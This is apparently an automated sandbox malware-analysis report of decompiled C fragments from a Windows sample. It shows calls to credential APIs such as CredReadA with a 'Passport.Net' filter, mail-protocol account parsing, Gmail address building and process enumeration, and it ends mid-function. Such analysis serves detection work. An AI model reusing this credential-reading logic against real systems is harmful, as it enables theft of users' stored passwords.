                                                                        0x0040d6df
                                                                        0x0040d6df
                                                                        0x0040d627
                                                                        0x0040d6e5
                                                                        0x0040d6f0
                                                                        0x0040d6fa

                                                                        APIs
                                                                          • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                          • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,73AFF420), ref: 00404654
                                                                          • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                          • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                          • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                          • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                          • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                          • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                          • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                                        • strlen.MSVCRT ref: 0040D6B7
                                                                        • strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                                        • LocalFree.KERNEL32(?), ref: 0040D6D5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$LibraryLoadstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                                        • String ID: Passport.Net\*$hwA
                                                                        • API String ID: 3335197805-2625321100
                                                                        • Opcode ID: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                                        • Instruction ID: 2e6419ae4a5a1056fcde8d8ccc48918818cbcf4cd0f285746335566170a6875e
                                                                        • Opcode Fuzzy Hash: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                                        • Instruction Fuzzy Hash: D4315C76D00109ABCB10EF96D9449EEB7BDEF84300F10047AF605E7291DB399A45CB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00407EFB, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 41%
                                                                        			E00407EFB(void* __ecx, void* __eflags, struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
				int _v0;
				int _t26;
				char* _t32;
				int _t44;
				signed int _t46;
				signed int _t47;

				_t38 = __ecx;
				_t47 = _t46 & 0xfffffff8;
				E004118A0(0x1040, __ecx);
				_t26 = GetMenuItemCount(_a8);
				_t44 = 0;
				_v0 = _t26;
				if(_t26 <= 0) {
					L13:
					return _t26;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a53, 0, 0x1000);
					_t47 = _t47 + 0xc;
					_a40 =  &_a52;
					_a4.cbSize = 0x30;
					_a8 = 0x36;
					_a44 = 0x1000;
					_a20 = 0;
					_a52 = 0;
					_t26 = GetMenuItemInfoA(_a8, _t44, 1,  &_a4);
					if(_t26 == 0) {
						goto L12;
					}
					if(_a52 == 0) {
						L10:
						_t55 = _a24;
						if(_a24 != 0) {
							_push(0);
							_push(_a24);
							_push(_a4.cbSize);
							_t26 = E00407EFB(_t38, _t55);
							_t47 = _t47 + 0xc;
						}
						goto L12;
					}
					_t32 = strchr( &_a52, 9);
					if(_t32 != 0) {
						 *_t32 = 0;
					}
					_t33 = _a20;
					if(_a24 != 0) {
						if(_a12 == 0) {
							 *0x4171b4 =  *0x4171b4 + 1;
							_t33 =  *0x4171b4 + 0x11558;
							__eflags =  *0x4171b4 + 0x11558;
						} else {
							_t18 = _t44 + 0x11171; // 0x11171
							_t33 = _t18;
						}
					}
					_t26 = E00407EC3(_t33,  &_a52);
					_pop(_t38);
					goto L10;
					L12:
					_t44 = _t44 + 1;
				} while (_t44 < _v0);
				goto L13;
			}









                                                                        0x00407efb
                                                                        0x00407efe
                                                                        0x00407f06
                                                                        0x00407f10
                                                                        0x00407f18
                                                                        0x00407f1c
                                                                        0x00407f20
                                                                        0x00407fe5
                                                                        0x00407fea
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407f26
                                                                        0x00407f26
                                                                        0x00407f31
                                                                        0x00407f36
                                                                        0x00407f3d
                                                                        0x00407f4c
                                                                        0x00407f54
                                                                        0x00407f5c
                                                                        0x00407f64
                                                                        0x00407f68
                                                                        0x00407f6c
                                                                        0x00407f74
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407f7a
                                                                        0x00407fc4
                                                                        0x00407fc4
                                                                        0x00407fc8
                                                                        0x00407fca
                                                                        0x00407fcb
                                                                        0x00407fcf
                                                                        0x00407fd2
                                                                        0x00407fd7
                                                                        0x00407fd7
                                                                        0x00000000
                                                                        0x00407fc8
                                                                        0x00407f83
                                                                        0x00407f8c
                                                                        0x00407f8e
                                                                        0x00407f8e
                                                                        0x00407f94
                                                                        0x00407f98
                                                                        0x00407f9d
                                                                        0x00407fa7
                                                                        0x00407fb2
                                                                        0x00407fb2
                                                                        0x00407f9f
                                                                        0x00407f9f
                                                                        0x00407f9f
                                                                        0x00407f9f
                                                                        0x00407f9d
                                                                        0x00407fbd
                                                                        0x00407fc3
                                                                        0x00000000
                                                                        0x00407fda
                                                                        0x00407fda
                                                                        0x00407fdb
                                                                        0x00000000

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ItemMenu$CountInfomemsetstrchr
                                                                        • String ID: 0$6
                                                                        • API String ID: 2300387033-3849865405
                                                                        • Opcode ID: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                                        • Instruction ID: e6a74f55cf859b5146a282672b091174d688b167a10cd96a0b5acbf0203f559b
                                                                        • Opcode Fuzzy Hash: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                                        • Instruction Fuzzy Hash: B821917190C381AFD7109F21D88199BBBE8FB84348F44897FF68496290E779E944CB5B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004044DA, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 66%
                                                                        			E004044DA(intOrPtr __ecx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v668;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t44;
				intOrPtr _t50;
				void* _t56;
				intOrPtr _t58;
				void* _t63;

				_t63 = __fp0;
				_t50 = __ecx;
				_v8 = __ecx;
				E004021D8( &_v940);
				_t58 = _a4;
				_v800 =  *((intOrPtr*)(_t50 + 0xd6c));
				_push(_t58 + 0x404);
				_t44 = 0x7f;
				E004060D0(_t44,  &_v796);
				E004060D0(_t44,  &_v408, _t58 + 0x204);
				E004060D0(_t44,  &_v928, _t58 + 4);
				E004060D0(_t44,  &_v668, _t58 + 0x104);
				_t37 = E004060D0(_t44,  &_v280, _t58 + 0x304);
				_t56 = _t58 + 0x504;
				_push("pop3");
				_push(_t56);
				L004115B2();
				if(_t37 != 0) {
					_push("imap");
					_push(_t56);
					L004115B2();
					if(_t37 != 0) {
						_push("smtp");
						_push(_t56);
						L004115B2();
						if(_t37 == 0) {
							_v412 = 4;
						}
					} else {
						_v412 = 2;
					}
				} else {
					_v412 = 1;
				}
				_v24 =  *((intOrPtr*)(_t58 + 0x804));
				_v20 =  *((intOrPtr*)(_t58 + 0x808));
				return E00402407( &_v940, _t63, _v8 + 0xfffffe38);
			}























                                                                        0x004044da
                                                                        0x004044e6
                                                                        0x004044ee
                                                                        0x004044f1
                                                                        0x004044fc
                                                                        0x004044ff
                                                                        0x0040450b
                                                                        0x0040450e
                                                                        0x00404515
                                                                        0x00404527
                                                                        0x00404536
                                                                        0x00404548
                                                                        0x0040455a
                                                                        0x0040455f
                                                                        0x00404565
                                                                        0x0040456a
                                                                        0x0040456b
                                                                        0x00404575
                                                                        0x00404583
                                                                        0x00404588
                                                                        0x00404589
                                                                        0x00404592
                                                                        0x004045a0
                                                                        0x004045a5
                                                                        0x004045a6
                                                                        0x004045af
                                                                        0x004045b1
                                                                        0x004045b1
                                                                        0x00404594
                                                                        0x00404594
                                                                        0x00404594
                                                                        0x00404577
                                                                        0x00404577
                                                                        0x00404577
                                                                        0x004045c1
                                                                        0x004045ca
                                                                        0x004045e5

                                                                        APIs
                                                                          • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                          • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                        • _stricmp.MSVCRT(?,pop3,?,?,?,?,?), ref: 0040456B
                                                                        • _stricmp.MSVCRT(?,imap), ref: 00404589
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _stricmp$memcpystrlen
                                                                        • String ID: imap$pop3$smtp
                                                                        • API String ID: 445763297-821077329
                                                                        • Opcode ID: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                                        • Instruction ID: 85134e65636b23d23915c58aa006eeb0f313b09a76600224a93e2cbe40a0dcf5
                                                                        • Opcode Fuzzy Hash: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                                        • Instruction Fuzzy Hash: 8F2174B2500318ABC711DB61CD41BDBB3FDAF50314F10056BE64AB3181DBB87B858B9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004036CC, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004036CC(void* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				char _v5;
				char _v132;
				char _v404;
				char _v532;
				intOrPtr _v536;
				char _v920;
				intOrPtr _v924;
				char _v1052;
				char _v1064;
				void* __ebx;
				void* _t18;
				char* _t20;
				char* _t39;
				char* _t41;
				void* _t48;
				void* _t59;

				_t59 = __fp0;
				_t48 = __edi;
				if( *((intOrPtr*)(__edi + 0x888)) == 0) {
					return _t18;
				}
				_t39 =  &_v132;
				_t20 = E0040E906(_t39, __edi + 0x87c, _a4);
				if(_t20 != 0) {
					_v5 = 0;
					_t20 = strchr(_t39, 0x3a);
					_t41 = _t20;
					if(_t41 != 0) {
						 *_t41 = 0;
						E004021D8( &_v1064);
						strcpy( &_v404,  &(_t41[1]));
						strcpy( &_v532,  &_v132);
						_v924 = 7;
						_v536 = 3;
						if(strlen( &_v532) + 0xa < 0x7f) {
							sprintf( &_v920, "%s@gmail.com",  &_v532);
						}
						strcpy( &_v1052,  &_v532);
						_t20 = E00402407( &_v1064, _t59, _t48);
					}
				}
				return _t20;
			}



















                                                                        0x004036cc
                                                                        0x004036cc
                                                                        0x004036dc
                                                                        0x004037ae
                                                                        0x004037ae
                                                                        0x004036ed
                                                                        0x004036f0
                                                                        0x004036f7
                                                                        0x00403702
                                                                        0x00403706
                                                                        0x0040370b
                                                                        0x00403711
                                                                        0x0040371e
                                                                        0x00403721
                                                                        0x0040372f
                                                                        0x0040373f
                                                                        0x0040374b
                                                                        0x00403755
                                                                        0x0040376e
                                                                        0x00403783
                                                                        0x00403788
                                                                        0x00403799
                                                                        0x004037a7
                                                                        0x004037a7
                                                                        0x00403711
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                                          • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                                          • Part of subcall function 0040E906: memcpy.MSVCRT ref: 0040E966
                                                                          • Part of subcall function 0040E906: CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                                        • strchr.MSVCRT ref: 00403706
                                                                        • strcpy.MSVCRT(?,00000001,?,?,?), ref: 0040372F
                                                                        • strcpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 0040373F
                                                                        • strlen.MSVCRT ref: 0040375F
                                                                        • sprintf.MSVCRT ref: 00403783
                                                                        • strcpy.MSVCRT(?,?), ref: 00403799
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strcpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                        • String ID: %s@gmail.com
                                                                        • API String ID: 2649369358-4097000612
                                                                        • Opcode ID: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                                        • Instruction ID: 7e171057c748ab9e8bd63aa8a265ef6dac548e8f33c4ed25ddb9a168741e2a8b
                                                                        • Opcode Fuzzy Hash: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                                        • Instruction Fuzzy Hash: B221ABF294411C6EDB11DB55DC85FDA77ACAB54308F4004BBE609E2081EA789BC48B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040684D, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040684D(char* __ebx, intOrPtr _a4, int _a8) {
				char _v8;
				void _v1031;
				void _v1032;
				void* _t26;
				char* _t27;
				int _t32;
				int _t38;
				char* _t43;
				int _t44;
				void* _t45;
				void** _t48;
				void* _t50;
				void* _t51;

				_t43 = __ebx;
				_t44 = 0;
				_v1032 = 0;
				memset( &_v1031, 0, 0x3ff);
				_t26 = _a8;
				_t51 = _t50 + 0xc;
				 *__ebx = 0;
				if(_t26 > 0) {
					_t48 = _a4 + 4;
					_v8 = _t26;
					do {
						sprintf( &_v1032, "%s (%s)",  *((intOrPtr*)(_t48 - 4)),  *_t48);
						_t32 = strlen( &_v1032);
						_a8 = _t32;
						memcpy(_t44 + __ebx,  &_v1032, _t32 + 1);
						_t45 = _t44 + _a8 + 1;
						_t38 = strlen( *_t48);
						_a8 = _t38;
						memcpy(_t45 + __ebx,  *_t48, _t38 + 1);
						_t51 = _t51 + 0x30;
						_t48 =  &(_t48[2]);
						_t18 =  &_v8;
						 *_t18 = _v8 - 1;
						_t44 = _t45 + _a8 + 1;
					} while ( *_t18 != 0);
				}
				_t27 = _t44 + _t43;
				 *_t27 = 0;
				 *((char*)(_t27 + 1)) = 0;
				return _t43;
			}
















                                                                        0x0040684d
                                                                        0x0040685c
                                                                        0x00406866
                                                                        0x0040686d
                                                                        0x00406872
                                                                        0x00406875
                                                                        0x0040687a
                                                                        0x0040687d
                                                                        0x00406883
                                                                        0x00406886
                                                                        0x00406889
                                                                        0x0040689a
                                                                        0x004068a6
                                                                        0x004068ab
                                                                        0x004068bb
                                                                        0x004068c5
                                                                        0x004068c9
                                                                        0x004068ce
                                                                        0x004068d9
                                                                        0x004068e1
                                                                        0x004068e4
                                                                        0x004068e7
                                                                        0x004068e7
                                                                        0x004068ea
                                                                        0x004068ea
                                                                        0x004068f0
                                                                        0x004068f1
                                                                        0x004068f4
                                                                        0x004068f7
                                                                        0x004068ff

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memcpystrlen$memsetsprintf
                                                                        • String ID: %s (%s)
                                                                        • API String ID: 3756086014-1363028141
                                                                        • Opcode ID: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                                        • Instruction ID: 70c58cdfc2d4abbd805528426562f63df61edbbac87544aa2a0c8fc412f19922
                                                                        • Opcode Fuzzy Hash: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                                        • Instruction Fuzzy Hash: 371193B2800158BFDF21DF58CC44BD9BBEDEF41308F00856AEA49EB112D674EA55CB98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040E906, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 25%
                                                                        			E0040E906(void* __ebx, int _a4, void* _a8) {
				char _v20;
				char _v36;
				char _v52;
				void* _t15;
				void* _t17;
				void* _t28;
				intOrPtr* _t31;
				int _t32;

				_t28 = __ebx;
				_t31 = __imp__UuidFromStringA;
				_t15 =  *_t31("5e7e8100-9138-11d1-945a-00c04fc308ff",  &_v36);
				_t17 =  *_t31("00000000-0000-0000-0000-000000000000",  &_v20);
				if(_t15 != 0 || _t17 != 0 || E0040E8CA( &_v52, _a4,  &_v36,  &_v20, _a8,  &_a4,  &_a8) != 0) {
					return 0;
				} else {
					_t32 = _a4;
					if(_t32 > 0x7e) {
						_t32 = 0x7e;
					}
					memcpy(_t28, _a8, _t32);
					 *((char*)(_t28 + _t32)) = 0;
					__imp__CoTaskMemFree(_a8);
					return 1;
				}
			}











                                                                        0x0040e906
                                                                        0x0040e90d
                                                                        0x0040e91d
                                                                        0x0040e92a
                                                                        0x0040e92e
                                                                        0x00000000
                                                                        0x0040e956
                                                                        0x0040e956
                                                                        0x0040e95c
                                                                        0x0040e960
                                                                        0x0040e960
                                                                        0x0040e966
                                                                        0x0040e971
                                                                        0x0040e975
                                                                        0x00000000
                                                                        0x0040e97d

                                                                        APIs
                                                                        • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                                        • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                                        • memcpy.MSVCRT ref: 0040E966
                                                                        • CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                                        Strings
                                                                        • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 0040E918
                                                                        • 00000000-0000-0000-0000-000000000000, xrefs: 0040E925
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FromStringUuid$FreeTaskmemcpy
                                                                        • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                        • API String ID: 1640410171-3316789007
                                                                        • Opcode ID: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                                        • Instruction ID: cd3b670b1268c91d98ef63b10095ff511f923cb8a4afa2e2ee491a09b7572d99
                                                                        • Opcode Fuzzy Hash: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                                        • Instruction Fuzzy Hash: AD01ADB350011CBADF01ABA6CD40DEB7BACAF08354F004833FD45E6150E634EA198BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409E32, Relevance: 10.5, APIs: 7, Instructions: 43windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00409E32(void* __eax, void* __ecx, intOrPtr* __edi, void* __esi) {

				 *__edi =  *__edi + __ecx;
			}



                                                                        0x00409e38

                                                                        APIs
                                                                          • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A026
                                                                          • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A040
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                                        • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                                        • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                                        • SendMessageA.USER32(?,00001003,00000002,?), ref: 00409EBB
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                        • String ID:
                                                                        • API String ID: 3673709545-0
                                                                        • Opcode ID: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                                        • Instruction ID: 438777344fc2c20ac6f2013a54106063ce42bca0c095daa55fabf7fed0819ee6
                                                                        • Opcode Fuzzy Hash: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                                        • Instruction Fuzzy Hash: 4E013C71280304BFFA325B60EE4BFD67AA6EB48B01F004425F349A90E1C7F56C61DA18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409E33, Relevance: 10.5, APIs: 7, Instructions: 42windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00409E33(void* __eax, void* __ecx, intOrPtr* __edi) {

				 *__edi =  *__edi + __ecx;
			}



                                                                        0x00409e38

                                                                        APIs
                                                                          • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A026
                                                                          • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A040
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                                        • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                                        • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                                        • SendMessageA.USER32(?,00001003,00000002,?), ref: 00409EBB
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                        • String ID:
                                                                        • API String ID: 3673709545-0
                                                                        • Opcode ID: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                                        • Instruction ID: f483db5831cad9889e7f207d848437a4a82f195d6e7bb7359e2425aa16285a4b
                                                                        • Opcode Fuzzy Hash: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                                        • Instruction Fuzzy Hash: 98011971281304BFFA321B60EE47FD97BA6EB48B00F014425F749A90E2CBF16860DA18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00407D0A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E00407D0A(void* __eflags, struct HWND__* _a4) {
				void _v4103;
				char _v4104;
				void* _t8;
				void* _t17;

				_t8 = E004118A0(0x1004, _t17);
				_t21 =  *0x4171b8;
				if( *0x4171b8 != 0) {
					_v4104 = 0;
					memset( &_v4103, 0, 0x1000);
					sprintf(0x4172c0, "dialog_%d",  *0x417300);
					if(E00407DE5(_t17, _t21, "caption",  &_v4104) != 0) {
						SetWindowTextA(_a4,  &_v4104);
					}
					return EnumChildWindows(_a4, E00407CAD, 0);
				}
				return _t8;
			}







                                                                        0x00407d12
                                                                        0x00407d17
                                                                        0x00407d1e
                                                                        0x00407d2e
                                                                        0x00407d35
                                                                        0x00407d4a
                                                                        0x00407d65
                                                                        0x00407d71
                                                                        0x00407d71
                                                                        0x00000000
                                                                        0x00407d81
                                                                        0x00407d88

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00407D35
                                                                        • sprintf.MSVCRT ref: 00407D4A
                                                                          • Part of subcall function 00407DE5: memset.MSVCRT ref: 00407E09
                                                                          • Part of subcall function 00407DE5: GetPrivateProfileStringA.KERNEL32(004172C0,0000000A,00412466,?,00001000,004171B8), ref: 00407E2B
                                                                          • Part of subcall function 00407DE5: strcpy.MSVCRT(?,?), ref: 00407E45
                                                                        • SetWindowTextA.USER32(?,?), ref: 00407D71
                                                                        • EnumChildWindows.USER32 ref: 00407D81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindowssprintfstrcpy
                                                                        • String ID: caption$dialog_%d
                                                                        • API String ID: 246480800-4161923789
                                                                        • Opcode ID: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                                        • Instruction ID: 1b9ef3c80e7b29f71c03deb4ce56ff4662aaf0b85baafec8cd622ba642293ebf
                                                                        • Opcode Fuzzy Hash: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                                        • Instruction Fuzzy Hash: 40F02B305482887EEB12AB91DC06FE83B685F08786F0040B6BB44E11E0D7F85AC0C71E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040E255, Relevance: 9.1, APIs: 6, Instructions: 142stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 35%
                                                                        			E0040E255(void* __ecx, void* __eflags, long _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				unsigned int _v16;
				int _v20;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v308;
				intOrPtr _v312;
				void _v316;
				void _v579;
				char _v580;
				char _v844;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				char _v1132;
				char _v17516;
				void* __edi;
				void* __esi;
				void* _t63;
				void* _t64;
				void* _t77;
				intOrPtr _t84;
				void _t94;
				int _t102;
				void* _t106;
				void* _t107;

				E004118A0(0x446c, __ecx);
				_t102 = 0;
				_v20 = 0;
				if(E0040629C() == 0 ||  *0x417518 == 0) {
					if( *0x417514 != _t102) {
						_t94 = _a4;
						_t63 =  *0x416fe0(8, _t94);
						_v8 = _t63;
						if(_t63 != 0xffffffff) {
							_v20 = 1;
							_v1132 = 0x224;
							_t64 =  *0x416fd8(_t63,  &_v1132);
							while(_t64 != 0) {
								memset( &_v316, _t102, 0x118);
								_v312 = _v1104;
								_v316 = _t94;
								strcpy( &_v308,  &_v844);
								_v44 = _v1108;
								_t107 = _t107 + 0x14;
								_v40 = _v1112;
								_v1132 = 0x224;
								if(E0040E45F(_a8,  &_v316) != 0) {
									_t64 =  *0x416fd4(_v8,  &_v1132);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t77 = OpenProcess(0x410, 0, _a4);
					_v8 = _t77;
					if(_t77 != 0) {
						_push( &_v16);
						_push(0x4000);
						_push( &_v17516);
						_push(_t77);
						if( *0x416fe4() != 0) {
							_t6 =  &_v16;
							 *_t6 = _v16 >> 2;
							_v20 = 1;
							_v12 = 0;
							if( *_t6 != 0) {
								while(1) {
									_v580 = 0;
									memset( &_v579, _t102, 0x104);
									memset( &_v316, _t102, 0x118);
									_t84 =  *((intOrPtr*)(_t106 + _v12 * 4 - 0x4468));
									_t107 = _t107 + 0x18;
									_v316 = _a4;
									_v312 = _t84;
									 *0x416fdc(_v8, _t84,  &_v580, 0x104);
									E0040E172( &_v308,  &_v580);
									_push(0xc);
									_push( &_v32);
									_push(_v312);
									_push(_v8);
									if( *0x416fe8() != 0) {
										_v44 = _v28;
										_v40 = _v32;
									}
									if(E0040E45F(_a8,  &_v316) == 0) {
										goto L18;
									}
									_v12 = _v12 + 1;
									if(_v12 < _v16) {
										_t102 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
